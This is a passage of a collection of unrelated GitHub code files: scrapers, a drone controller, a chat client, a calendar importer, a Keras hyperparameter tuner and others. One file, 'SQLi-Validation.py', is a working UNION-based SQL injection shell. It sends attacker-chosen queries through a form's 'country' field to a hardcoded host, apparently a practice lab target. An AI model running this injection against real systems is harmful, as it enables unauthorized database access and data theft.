kMs0: Union[float, None],\n kFr1: Union[float, None], kFs1: Union[float, None], kFz1: Union[float, None],\n kMr1: Union[float, None], kMs1: Union[float, None],\n kFr2: Union[float, None], kFs2: Union[float, None], kFz2: Union[float, None],\n kMr2: Union[float, None], kMs2: Union[float, None],\n angle: Union[float, None]):\n # cad layer\n structure_layer: StructureLayer = model.cad_manager.structure_layer\n # add area spring\n area_spring = structure_layer.add_area_spring(polygon)\n # set properties of area spring\n if name is not None:\n area_spring.name = name\n if 
elevation is not None:\n area_spring.elevation = elevation\n if angle is not None:\n area_spring.angle = angle\n # point 1 stiffness values\n if kFr0 is not None:\n area_spring.kFr0 = kFr0\n if kFs0 is not None:\n area_spring.kFs0 = kFs0\n if kFz0 is not None:\n area_spring.kFz0 = kFz0\n if kMr0 is not None:\n area_spring.kMr0 = kMr0\n if kMs0 is not None:\n area_spring.kMs0 = kMs0\n # point 2 stiffness values\n if kFr1 is not None:\n area_spring.kFr1 = kFr1\n if kFs1 is not None:\n area_spring.kFs1 = kFs1\n if kFz1 is not None:\n area_spring.kFz1 = kFz1\n if kMr1 is not None:\n area_spring.kMr1 = kMr1\n if kMs1 is not None:\n area_spring.kMs1 = kMs1\n # point 3 stiffness values\n if kFr2 is not None:\n area_spring.kFr2 = kFr2\n if kFs2 is not None:\n area_spring.kFs2 = kFs2\n if kFz2 is not None:\n area_spring.kFz2 = kFz2\n if kMr2 is not None:\n area_spring.kMr2 = kMr2\n if kMs2 is not None:\n area_spring.kMs2 = kMs2\n","repo_name":"mitchell-tesch/ghConcept","sub_path":"gh_concept/concept/add_structure.py","file_name":"add_structure.py","file_ext":"py","file_size_in_byte":12369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"32996896495","text":"import datetime\nfrom requests_html import HTMLSession\nfrom peewee import DoesNotExist\nfrom db2 import Keyword, Page, Category, PageKeywords\n\n\nmy_keys = [\n 'buy laptop',\n 'buy xiaomi',\n 'buy iphone',\n # 'buy samsung'\n]\n\n\ndef google_craper(keyword, category_id, lang='en', serp_count=10):\n\n try:\n\n db_key = Keyword.get(name=keyword)\n db_key.updated = datetime.datetime.now()\n db_key.save()\n\n except DoesNotExist:\n db_key = Keyword.create(\n name=keyword,\n updated=datetime.datetime.now(),\n category_id=category_id\n )\n\n session = HTMLSession()\n\n resp = session.get(\n f'https://www.google.com/search?q={db_key.name}&num={serp_count}&hl={lang}')\n\n snipets = resp.html.xpath('//div[@class=\"g\"]')\n\n db_pages = []\n\n for sn in snipets:\n title = sn.xpath('//h3')[0].text\n description = sn.xpath('//span[@class=\"st\"]')[0].text\n url = sn.xpath('//div[@class=\"r\"]/a[1]/@href')[0]\n\n data = {\n 'title': title,\n 'description': description,\n 'url': url\n }\n\n db_pages.append(data)\n\n # try:\n #\n # page_id = Page.create(**data)\n # db_key.pages.add(Page.get(Page.id == page_id))\n # print(page_id, url)\n #\n # except Exception as e:\n # print(e, type(e), url)\n\n Page.insert_many(db_pages).execute()\n\n\ndef main():\n try:\n category = Category.get(name='ecommerce')\n\n except DoesNotExist:\n category = Category.create(\n name='ecommerce',\n description='ecommerce category'\n )\n\n PageKeywords.delete().execute()\n Page.delete().execute()\n\n for key in my_keys:\n google_craper(key, category)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"vertinskiy-oleg/python-for-seo","sub_path":"code from lessons/23_less_sql_orm_peewee/gcrawler.py","file_name":"gcrawler.py","file_ext":"py","file_size_in_byte":1819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"6380247552","text":"import scrapy\nfrom selenium import webdriver\nfrom wangyiPro.items import WangyiproItem\n\n\nclass WangyiSpider(scrapy.Spider):\n name = 'wangyi'\n # allowed_domains = ['www.com']\n start_urls = ['https://news.163.com/']\n model_urls = [] # store the URLs of the five main sections\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.bro = webdriver.Edge()\n\n # parse the news titles and detail-page URLs from each section page\n def parse_model(self, response):\n div_list = 
response.xpath('//div[@class=\"ndi_main\"]/div')\n for div in div_list:\n if div.xpath('.//span[@class=\"tg_tag\"]/text()').extract_first() == '广告':\n continue\n title = div.xpath('./div[@class=\"news_title\"]/h3/a/text() | .//div[@class=\"news_title\"]/h3/a/text()').extract_first()\n new_detail_url = div.xpath('./div[@class=\"news_title\"]/h3/a/@href | .//div[@class=\"news_title\"]/h3/a/@href').extract_first()\n print(title)\n print(new_detail_url)\n item = WangyiproItem()\n item[\"title\"] = title\n # send a request to the news detail page\n yield scrapy.Request(url=new_detail_url, callback=self.parse_detail, meta={\"item\": item})\n\n # parse the news content\n def parse_detail(self, response):\n content = ''.join(response.xpath('//*[@id=\"content\"]/div[2]//text() |'\n ' //div[@class=\"viewport\"]//p/text()').extract())\n item = response.meta[\"item\"]\n item[\"content\"] = content\n yield item\n\n # parse the detail-page URLs of the five main sections\n def parse(self, response):\n li_list = response.xpath('//*[@id=\"index2016_wrap\"]/div[1]/div[2]/div[2]/div[2]/div[2]/div/ul/li')\n alist = [3, 4, 6, 7, 8]\n for index in alist:\n model_url = li_list[index].xpath('./a/@href').extract_first()\n self.model_urls.append(model_url)\n\n # send a request to each section URL in turn\n for url in self.model_urls:\n print(url)\n yield scrapy.Request(url=url, callback=self.parse_model)\n\n def closed(self, spider):\n self.bro.quit()\n\n","repo_name":"MrBin226/code","sub_path":"scrapy框架/wangyiPro/wangyiPro/spiders/wangyi.py","file_name":"wangyi.py","file_ext":"py","file_size_in_byte":2157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"71324516882","text":"import argparse\nimport cv2\n\nfrom telloControl import telloControl\nfrom telloCamera import telloCamera\n\n# Argument handling\ndef buildArgParser():\n # Instance for the arguments\n parser = argparse.ArgumentParser()\n # Add the allowed arguments\n parser.add_argument(\"-m\", default='k', nargs='?', choices=['k', 'c', 's', 'obj', 'p', 'face', 'r', 'pan', 'mf'],\n help=\"Enable keyboard control (k) / command control (c) / search color (s)\\n \\\n /object track (obj) /path search (p) /face track (face)\\n \\\n /hand number recognition (r) /panorama (pan) /multiface(mf)\")\n parser.add_argument(\"-t\", action='store_true', help=\"Enable test mode: no command sent\")\n parser.add_argument(\"-l\", action='store_true', help=\"Enable laptop camera\")\n parser.add_argument(\"-s\", default='36', help=\"For panorama search, number of steps\")\n parser.add_argument(\"-cm\", default=0.10, help=\"Margin for centering target on panorama\")\n args = parser.parse_args()\n\n return args.m, args.t, args.l, args.s, args.cm\n\ndef main():\n mode, test, laptop, steps, center_margin = buildArgParser()\n print(\"laptop:\", laptop)\n\n # Connect and start flying\n if not test:\n print(\"Working on real mode\")\n else:\n print(\"Working on test mode\")\n # Handle drone through chosen interface\n if mode == 'k':\n tCtrl = telloControl(test)\n print(\"Starting Tello control with keyboard...\")\n tCtrl.keyControl()\n elif mode == 'c':\n tCtrl = telloControl(test)\n print(\"Starting Tello control with command...\")\n tCtrl.commandControl()\n elif mode == 's':\n tCamera = telloCamera(test, trackfunction=\"Object\", useDroneCamera=not laptop)\n tCamera.calibrate()\n elif mode == 'p':\n try:\n tCamera = telloCamera(test, useDroneCamera=not laptop)\n tCamera.startVideoLoopSearchShapes()\n except ValueError:\n pass\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n elif mode == 'obj':\n print(\"Following object...\")\n 
tCamera = 
tCamera = telloCamera(test, \"Object\", not laptop)\n tCamera.startVideoLoopTarget()\n elif mode == 'face':\n print(\"Following face...\")\n tCamera = telloCamera(test, \"Face\", not laptop)\n tCamera.startVideoLoopTarget()\n elif mode == 'r':\n print(\"Recognizing hand numbers...\")\n tCamera = telloCamera(test, useDroneCamera=not laptop)\n tCamera.startVideoLoopSearchHand()\n elif mode == 'pan':\n print(\"Face count on panorama\")\n tCamera = telloCamera(test, useDroneCamera=not laptop)\n tCamera.startVideoLoopPanorama(steps=int(steps), center_margin=float(center_margin))\n elif mode == 'mf':\n print(\"Multiface count with repetition detection\")\n tCamera = telloCamera(test, useDroneCamera=not laptop)\n tCamera.startVideoLoopMultiFace()\n\nif __name__ == '__main__':\n exit(main())\n\n","repo_name":"jadepedro/Tello-Computer-Vision","sub_path":"TKC.py","file_name":"TKC.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43373224479","text":"n = int(input())\narr = list(map(int,input().split()))\n\n# 3으로 나누거나 2를 곱하므로 중복 불가\ndef calc(num, cnt, arr, result):\n num2 = num * 2\n num3 = num // 3\n r = num % 3\n \n if cnt == len(arr):\n return result\n \n if num2 in arr:\n result.append(num2)\n return calc(num2, cnt + 1, arr, result)\n \n elif r == 0 and num3 in arr:\n result.append(num3)\n return calc(num3, cnt + 1, arr, result)\n \n else:\n result = []\n cnt = 0\n return result\n \ndef print_list(List):\n for i in range(len(List)):\n print(List[i], end = ' ')\n\nfor num in arr:\n result = [num]\n result = calc(num, 1, arr, result)\n \n if len(result) == len(arr):\n print_list(result)\n break","repo_name":"hobin-jang/baekjoon","sub_path":"python/16936.py","file_name":"16936.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"37858753981","text":"#!/usr/bin/env python\n\nimport logging\nimport sys\n\nfrom domain_event_broker import Subscriber, Retry\n\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef handler(event):\n delay = 5.0 + (10.0 * event.retries)\n raise Retry(delay)\n\n\nif __name__ == '__main__':\n binding_keys = sys.argv[1:]\n subscriber = Subscriber()\n subscriber.register(handler, name='retry-ronny', binding_keys=binding_keys, max_retries=3)\n subscriber.start_consuming()\n","repo_name":"AbletonAG/domain-event-broker","sub_path":"examples/retry_after_delay.py","file_name":"retry_after_delay.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"10257156179","text":"#!/usr/bin/env python3\n\nimport random\nimport requests\nfrom bs4 import BeautifulSoup\nfrom cmd import Cmd\n\n\nclass Term(Cmd):\n\n prompt = \"> \"\n\n def default(self, args):\n name = f'mard-{random.randrange(1000000,9999999)}'\n resp = requests.post('http://10.10.11.116/',\n headers={\"Content-Type\": \"application/x-www-form-urlencoded\"},\n data={\"username\": name, \"country\": f\"' union {args};-- -\"})\n soup = BeautifulSoup(resp.text, 'html.parser')\n if soup.li:\n print('\\n'.join([x.text for x in soup.findAll('li')]))\n\n def do_quit(self, args):\n return 1\n\nterm = 
Term()\nterm.cmdloop()\n","repo_name":"Mardcore7/Python3","sub_path":"SQLi-Validation.py","file_name":"SQLi-Validation.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31422853754","text":"import socket\nimport threading\nfrom kivy.app import App\nfrom kivy.lang import Builder\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.properties import StringProperty\nfrom kivy.uix.button import Button\nfrom kivy.uix.textinput import TextInput\nfrom kivy.clock import mainthread\n\n\nKV = \"\"\"\nMyBl:\n\torientation: \"vertical\"\n\t\n\tLabel:\n\t\tfont_size: \"18sp\"\n\t\tmiltiline: True\n\t\ttext_size: self.width*0.98, self.height\n\t\tvalign: 'top'\n\t\tsize_hint_x: 1.0\n\t\tsize_hint_y: 0.7\n\t\theight: self.texture_size[1] + 15\n\t\ttext: root.data_label\n\t\t\n\tTextInput:\n\t\tid: Inp\n\t\tmiltiline: False\n\t\tpadding_y: (5,5)\n\t\tsize_hint: (1, 0.2)\n\t\ton_text: app.process()\n\t\n\tButton:\n\t\ttext: \"Send message\"\n\t\t\n\t\tbold: True\n\t\tbackground_color:'#70FF00'\n\t\tsize_hint: (1,0.1)\n\t\ton_press: root.callback()\n\"\"\"\n\nclass MyBl(BoxLayout):\n\tdata_label = StringProperty(\"Welcome!\\n\")\n\t\n\tdef __init__(self, **kwargs):\n\t\tsuper().__init__(**kwargs)\n\t\tSERVER = \"146.19.247.186\"\n\t\tPORT = 3000\n\t\tself.client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\tself.client.connect((SERVER, PORT))\n\t\tself.client.send('__join'.encode('ascii'))\n\t\tthreading.Thread(target=self.get_data).start()\n\t\n\tdef callback(self):\n\t\tmsg = self.ids.Inp.text\n\t\tself.set_data_label(\"You: \" + msg)\n\t\tself.client.send(msg.encode('ascii'))\n\t\t\n\tdef get_data(self):\n\t\tUDP_MAX_SIZE = 65535\n\t\twhile App.get_running_app().running:\n\t\t\tin_data = self.client.recv(UDP_MAX_SIZE)\n\t\t\tkkk = in_data.decode('ascii')\n\t\t\tself.set_data_label(kkk)\n\t\t\t\n\t@mainthread\n\tdef set_data_label(self, data):\n\t\tself.data_label += str(data) + \"\\n\"\t\t\t\n\t\nclass MyApp(App):\n\trunning = True\n\t\n\tdef process(self):\n\t\ttext = self.root.ids.Inp.text\n\t\n\tdef build(self):\n\t\treturn Builder.load_string(KV)\n\t\t\n\tdef on_stop(self):\n\t\tself.running = False\n\t\t\nMyApp().run()\n","repo_name":"AntonioWanderer/Chat-for-vps","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42812972716","text":"from fastapi import APIRouter\nfrom src.models import GreatestCommonDivisor\n\nrouter = APIRouter(\n prefix='/gcd',\n tags=['gcd']\n)\n\n@router.get(\"/\")\ndef gcd(x: int, n: int):\n result = __gcd(x, n)\n return GreatestCommonDivisor.GCD(gcd = result)\n\ndef __gcd(x: int, n: int):\n if x < n:\n x, n = n, x\n\n if n == 0:\n return x\n else:\n return __gcd(n, x % n)","repo_name":"hjnewman3/CryptoTools","sub_path":"src/routers/GreatestCommonDivisorRouter.py","file_name":"GreatestCommonDivisorRouter.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37947763482","text":"import shutil\nfrom pathlib import Path\n\n\ndef add_logger() -> None:\n current_path = Path(Path.cwd().parent) / \"services\" / \"logger.py\"\n install_path = Path.cwd() / \"page_rendering-0.1.0\" / \"page_rendering\"\n source_path = Path.cwd() / \"page_rendering\"\n shutil.copy(str(current_path), str(source_path))\n shutil.copy(str(current_path), 
str(install_path))\n\n\ndef get_setup() -> None:\n current_path = Path.cwd() / \"page_rendering-0.1.0\" / \"setup.py\"\n source_path = Path.cwd()\n shutil.move(str(current_path), str(source_path))\n","repo_name":"epam/badgerdoc","sub_path":"common/page_rendering/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"3"} +{"seq_id":"11819505489","text":"import pandas as pd\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom wittgenstein import RIPPER\n\n\ndef rule_induction(x_train, y_train, x_test, y_test):\n final_results = dict()\n\n df_train = pd.DataFrame(x_train)\n df_train['churn'] = pd.Series(y_train)\n\n x_test = pd.DataFrame(x_test)\n y_test = pd.DataFrame(y_test)\n\n model = RIPPER(verbosity=1)\n model.fit(df_train, class_feat=\"churn\")\n y_prediction = model.predict(x_test)\n cm = confusion_matrix(y_test, y_prediction)\n cr = classification_report(y_test, y_prediction, output_dict=True)\n\n final_results['model'] = model\n final_results['acc'] = (cm[0][0] + cm[1][1]) / (cm[0][0] + cm[1][0] + cm[0][1] + cm[1][1])\n final_results['cm'] = cm\n final_results['cr'] = cr\n\n print(final_results['acc'])\n\n return final_results\n","repo_name":"ggsdc/classification-exercise","sub_path":"src/functions/rule_induction.py","file_name":"rule_induction.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7724690726","text":"import urllib.request\nfrom bs4 import BeautifulSoup\ndef get_html(url):\n web=urllib.request.urlopen(url)\n soup=BeautifulSoup(web,\"html.parser\")\n data=soup.find(\"div\",id=\"wrapper\")\n return data\ndef get_all(data):\n data=data.find_all(\"table\")\n for link in data:\n name=link.find(\"div\",class_=\"pl2\").find(\"a\").get_text().replace(' ','').replace('\\n','')\n author=link.find(\"p\",class_=\"pl\").get_text().split('/')[0].replace(' ','')\n score=link.find(\"span\",class_=\"rating_nums\").get_text().replace(' ','')\n peoplenum=link.find(\"span\",class_=\"pl\").get_text().replace(' ','').replace('(','').replace(')','').replace('\\n','')\n try:\n remark=link.find(\"p\",class_=\"quote\").get_text().replace(' ','').replace('\\n','')\n except:\n remark='暂无评价'\n with open('/home/wei/桌面/book.txt','a+', encoding='UTF-8') as f:\n f.write(name+' '+author+' '+score+' '+peoplenum+' '+remark+'\\r\\n')\nif __name__ == '__main__':\n url='https://book.douban.com/top250?start='\n with open('/home/wei/桌面/book.txt','a+', encoding='UTF-8') as f:\n f.write('书籍名称 '+'作者 '+'评分 '+'评价人数 '+'评论 '+'\\r\\n')\n for i in range(10):\n url1=url+str(i*25)\n get_all(get_html(url1))","repo_name":"wym879/crawler","sub_path":"douban_book.py","file_name":"douban_book.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70214298641","text":"from __future__ import print_function\n\nimport datetime\nimport os.path\nimport shift_reader\nimport argparse\n\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom googleapiclient.discovery import build\nfrom googleapiclient.errors import HttpError\nfrom progress.bar import ChargingBar\n\n# If modifying these scopes, delete the file token.json.\nSCOPES = 
['https://www.googleapis.com/auth/calendar','https://www.googleapis.com/auth/calendar.events']\n\ndef get_calendar(gc_service, calendar_name):\n list_result = gc_service.calendarList().list().execute()\n calendars = list_result.get('items', [])\n out_calendar = None\n for calendar in calendars:\n if calendar['summary'] == calendar_name:\n out_calendar = calendar\n return out_calendar\n\ndef fetch_events(gc_service, calendar, timeMin, timeMax):\n events_result = gc_service.events().list(\n calendarId=calendar['id'],\n timeMin=timeMin.isoformat(),\n timeMax=timeMax.isoformat(),\n singleEvents=True,\n orderBy='startTime').execute()\n events = events_result.get('items', [])\n return events\n\ndef delete_events(gc_service, calendar, events):\n bar = ChargingBar('Deleting', max=len(events))\n for e in events:\n gc_service.events().delete(calendarId=calendar['id'], eventId=e['id'], sendUpdates='none').execute()\n bar.next()\n bar.finish()\n print(\"All events removed\")\n\ndef get_involved_time_range(availability):\n min_start_datetime = None\n max_end_datetime = None\n for item in availability:\n min_start_datetime = item['start'] if min_start_datetime is None or min_start_datetime > item['start'] else min_start_datetime\n max_end_datetime = item['end'] if max_end_datetime is None or max_end_datetime < item['end'] else min_start_datetime\n return min_start_datetime, max_end_datetime\n\ndef load_availability(gc_service, calendar, availability):\n bar = ChargingBar('Saving', max=len(availability))\n for a in availability:\n gc_service.events().insert(\n calendarId=calendar['id'],\n sendNotifications='none',\n body={\n 'summary': a['name'],\n 'start': {\n 'dateTime': a['start'].isoformat()\n },\n 'end': {\n 'dateTime': a['end'].isoformat()\n }\n }\n ).execute()\n bar.next()\n bar.finish()\n print(\"All {} events created\".format(len(availability)))\n\n\ndef main(args_namespace):\n \n CALENDAR_NAME = args_namespace.calendar\n AVAILABILITY_FILE = args_namespace.event_file\n \n creds = None\n # The file token.json stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.json'):\n creds = Credentials.from_authorized_user_file('token.json', SCOPES)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file('credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.json', 'w') as token:\n token.write(creds.to_json())\n\n try:\n service = build('calendar', 'v3', credentials=creds)\n\n # Search target calendar by name\n calendar = get_calendar(service, CALENDAR_NAME)\n if calendar is None:\n raise Exception(\"No calendar found with name {}\".format(CALENDAR_NAME))\n print(\"Target calendar: {} ({})\".format(calendar['summary'], calendar['id']))\n\n # Load availability from file\n availability_items = shift_reader.read_availability(AVAILABILITY_FILE)\n minTime, maxTime = get_involved_time_range(availability_items)\n print(\"Read {} items from file '{}'\".format(len(availability_items), AVAILABILITY_FILE))\n print(\"Time range: {} - {}\".format(minTime.isoformat(), maxTime.isoformat()))\n\n # Call API to fetch alredy saved events\n events = fetch_events(service, calendar, minTime, maxTime)\n\n if not events:\n print('No availability found in this 
time range')\n        else:\n            print('Found {} items already saved in calendar'.format(len(events)))\n            # Print the start, end and name of each event found\n            for event in events:\n                start = event['start'].get('dateTime', event['start'].get('date'))\n                end = event['end'].get('dateTime', event['end'].get('date'))\n                print(\"{} - {}: {}\".format(start, end, event['summary'] if 'summary' in event else 'No Title'))\n            remove = None\n            while remove is None:\n                print(\"All those items will be removed. Continue? (y/N): \", end='')\n                in_str = input().strip()\n                if len(in_str) == 0 or in_str.lower() == 'n':\n                    remove = False\n                elif in_str.lower() == 'y':\n                    remove = True\n                else:\n                    print(\"Invalid value. Please enter only 'y' or 'n'.\")\n            if remove:\n                delete_events(service, calendar, events)\n\n        load_availability(service, calendar, availability_items)\n\n    except HttpError as error:\n        print('An error occurred: %s' % error)\n\nparser = argparse.ArgumentParser(description='Load availability into Google Calendar.')\nparser.add_argument('-c', '--calendar', metavar='CALENDAR_NAME', help='the name of the calendar where you want to upload events.', action='store', required=False, default='Reperibilità')\nparser.add_argument('event_file', metavar='EVENT_FILE', help='the CSV file containing the events to upload.')\n\nif __name__ == '__main__':\n    main(parser.parse_args())","repo_name":"mircobe87/availability-importer","sub_path":"availability-importer.py","file_name":"availability-importer.py","file_ext":"py","file_size_in_byte":6034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42485857875","text":"import os\nimport sys\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nimport kerastuner as kt\nimport subprocess\n\nfrom .descriptor import featurizer\n\nfrom . 
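# (Editor's aside on the availability importer that ends above: with the copy-paste
# slip in get_involved_time_range corrected, the loop is just "earliest start,
# latest end". A minimal sketch with hypothetical items shaped like the ones
# shift_reader.read_availability would return:)
from datetime import datetime

availability = [
    {'name': 'shift B', 'start': datetime(2022, 1, 3, 8), 'end': datetime(2022, 1, 3, 16)},
    {'name': 'shift A', 'start': datetime(2022, 1, 1, 8), 'end': datetime(2022, 1, 1, 16)},
]

# Equivalent to get_involved_time_range: minimum of starts, maximum of ends.
min_start = min(item['start'] for item in availability)
max_end = max(item['end'] for item in availability)
assert (min_start, max_end) == (datetime(2022, 1, 1, 8), datetime(2022, 1, 3, 16))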
import TUNER_PROJECT_NAME, TUNER_MODEL_FOLDER, TFLITE_FILE, ONNX_FILE\n\n\nclass TunerRegressorTrainer(object):\n def __init__(self, X, y):\n self.X = X\n self.y = y\n self.input_shape = X.shape[1]\n self.output_shape = y.shape[1]\n self.cwd = os.getcwd()\n\n def _model_builder(self, hp):\n model = keras.Sequential()\n\n # Tune the number of units in the first Dense layer\n # Choose an optimal value between 32-512\n hp_units = hp.Int(\"units\", min_value=32, max_value=512, step=32)\n model.add(\n keras.layers.Dense(\n units=hp_units, activation=\"relu\", input_shape=(self.input_shape,)\n )\n )\n model.add(keras.layers.Dense(self.output_shape))\n\n # Tune the learning rate for the optimizer\n # Choose an optimal value from 0.01, 0.001, or 0.0001\n hp_learning_rate = hp.Choice(\"learning_rate\", values=[1e-2, 1e-3, 1e-4])\n\n model.compile(\n optimizer=keras.optimizers.Adam(learning_rate=hp_learning_rate),\n loss=\"mean_squared_error\",\n metrics=None,\n )\n\n return model\n\n def _search(self, X, y):\n self.tuner = kt.Hyperband(\n self._model_builder,\n objective=\"val_loss\",\n max_epochs=10,\n factor=3,\n directory=TUNER_PROJECT_NAME,\n project_name=\"trials\",\n )\n stop_early = tf.keras.callbacks.EarlyStopping(monitor=\"val_loss\", patience=5)\n self.tuner.search(\n X, y, epochs=50, validation_split=0.2, callbacks=[stop_early], verbose=True\n )\n self.best_hps = self.tuner.get_best_hyperparameters(num_trials=1)[0]\n\n def _get_best_epoch(self, X, y):\n # Build the model with the optimal hyperparameters and train it on the data for 50 epochs\n model = self.tuner.hypermodel.build(self.best_hps)\n history = model.fit(X, y, epochs=50, validation_split=0.2)\n\n val_per_epoch = history.history[\"val_loss\"]\n self.best_epoch = val_per_epoch.index(min(val_per_epoch)) + 1\n print(\"Best epoch: %d\" % (self.best_epoch,))\n\n def _final_train(self, X, y):\n self.hypermodel = self.tuner.hypermodel.build(self.best_hps)\n\n # Retrain the model\n self.hypermodel.fit(X, y, epochs=self.best_epoch, validation_split=0.2)\n\n def fit(self):\n self._search(self.X, self.y)\n self._get_best_epoch(self.X, self.y)\n self._final_train(self.X, self.y)\n self.hypermodel.save(os.path.join(TUNER_PROJECT_NAME, TUNER_MODEL_FOLDER))\n\n def export(self, output_dir):\n mdl = self.hypermodel\n print(\"Exporting model\")\n os.chdir(output_dir)\n input_model = mdl\n print(input_model.summary())\n print(\"Converting to TFLITE\")\n output_model = os.path.join(output_dir, TFLITE_FILE)\n converter = tf.lite.TFLiteConverter.from_keras_model(input_model)\n tflite_quant_model = converter.convert()\n with open(output_model, \"wb\") as o_:\n o_.write(tflite_quant_model)\n print(\"Converting to ONNX\")\n cmd = \"{0} -m tf2onnx.convert --opset 13 --tflite {1} --output {2}\".format(\n sys.executable, TFLITE_FILE, ONNX_FILE\n )\n print(cmd)\n subprocess.Popen(cmd, shell=True).wait()\n print(\"Conversions done!\")\n os.chdir(self.cwd)\n\n\ndef train_model(smiles, y):\n X = featurizer(smiles)\n y = np.array(y).reshape(-1, 1)\n mdl = TunerRegressorTrainer(X, y)\n mdl.fit()\n mdl.export(\".\")\n\n","repo_name":"ersilia-os/keras-tuner-chem","sub_path":"src/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23530624928","text":"from lib2to3.pgen2.token import OP\r\nfrom get_distribution_type import get_best_distribution\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy.stats import norm\r\nimport 
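# (Editor's aside on the keras-tuner record above: a self-contained sketch of the
# same Hyperband flow on synthetic data. Shapes, directory and project names are
# made up for illustration; it assumes kerastuner is installed as imported above.)
import numpy as np
import kerastuner as kt
from tensorflow import keras

def build(hp):
    # The same two knobs the trainer tunes: first-layer width and learning rate.
    model = keras.Sequential([
        keras.layers.Dense(hp.Int("units", 32, 512, step=32), activation="relu", input_shape=(8,)),
        keras.layers.Dense(1),
    ])
    model.compile(optimizer=keras.optimizers.Adam(hp.Choice("learning_rate", [1e-2, 1e-3, 1e-4])),
                  loss="mean_squared_error")
    return model

X, y = np.random.rand(256, 8), np.random.rand(256, 1)
tuner = kt.Hyperband(build, objective="val_loss", max_epochs=4, factor=3,
                     directory="kt_demo", project_name="trials")
tuner.search(X, y, epochs=4, validation_split=0.2, verbose=0)
best_hps = tuner.get_best_hyperparameters(num_trials=1)[0]
print(best_hps.get("units"), best_hps.get("learning_rate"))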
matplotlib.pyplot as plt\r\nimport seaborn as sns \r\nsns.set_theme(color_codes=True, style=\"whitegrid\")\r\n\r\n\r\n\r\ndef cost_from_tol_hard_approach(x0):\r\n\r\n    try:\r\n        \r\n        # load in HRI columns\r\n        # df = pd.read_csv(\"data/prep/max_filtered_hri_meta_eol.csv\")\r\n        df = pd.read_csv(\"data/prep/max_filtered_final.csv\").iloc[:, 2:] \r\n        # print(df.columns)\r\n\r\n        \r\n    except Exception as e:\r\n        print(f\"Exception: {e} \\n\\n cannot read file 'data/prep/max_filtered_final.csv'\")\r\n\r\n\r\n    df_above = df[(df[df.columns[0]] > x0[0]) | \\\r\n                  (df[df.columns[1]] > x0[1]) | \\\r\n                  (df[df.columns[2]] > x0[2]) | \\\r\n                  (df[df.columns[3]] > x0[3]) | \\\r\n                  (df[df.columns[4]] > x0[4]) | \\\r\n                  (df[df.columns[5]] > x0[5]) | \\\r\n                  (df[df.columns[6]] > x0[6]) | \\\r\n                  (df[df.columns[7]] > x0[7]) | \\\r\n                  (df[df.columns[8]] > x0[8]) | \\\r\n                  (df[df.columns[9]] > x0[9])]\r\n    \r\n    \r\n\r\n    \r\n    def visualisierung_für_validierung(x0, df_komplett, df_toleranz_gerissen):\r\n        \r\n        i,j=0,0\r\n        PLOTS_PER_ROW = 5\r\n        PLOTS_PER_COL = 2\r\n\r\n        fig, axs = plt.subplots(PLOTS_PER_COL, PLOTS_PER_ROW, figsize=(16, 7))\r\n        fig.tight_layout(pad=4.4, w_pad=5.5, h_pad=5.0)\r\n        # fig.suptitle('histogram for each dimension of the predicted dataframe - compare to real data')\r\n        fig.subplots_adjust(hspace=0.3, wspace=.3)\r\n        for index, col in enumerate(df_komplett.columns):\r\n            plot = sns.histplot(ax=axs[i][j], data=df_komplett, x=str(col), kde=True)\r\n            axs[i][j].axvline(x0[index], 0,10, c=\"red\")\r\n            j+=1\r\n            if j%PLOTS_PER_ROW==0:\r\n                i+=1\r\n                j=0\r\n        # plt.savefig('Tol-cost-gerissen.svg')\r\n        plt.show()\r\n        i,j=0,0 # reset the subplot indices before the second figure\r\n        fig, axs = plt.subplots(PLOTS_PER_COL, PLOTS_PER_ROW, figsize=(16, 7))\r\n        fig.tight_layout(pad=4.4, w_pad=5.5, 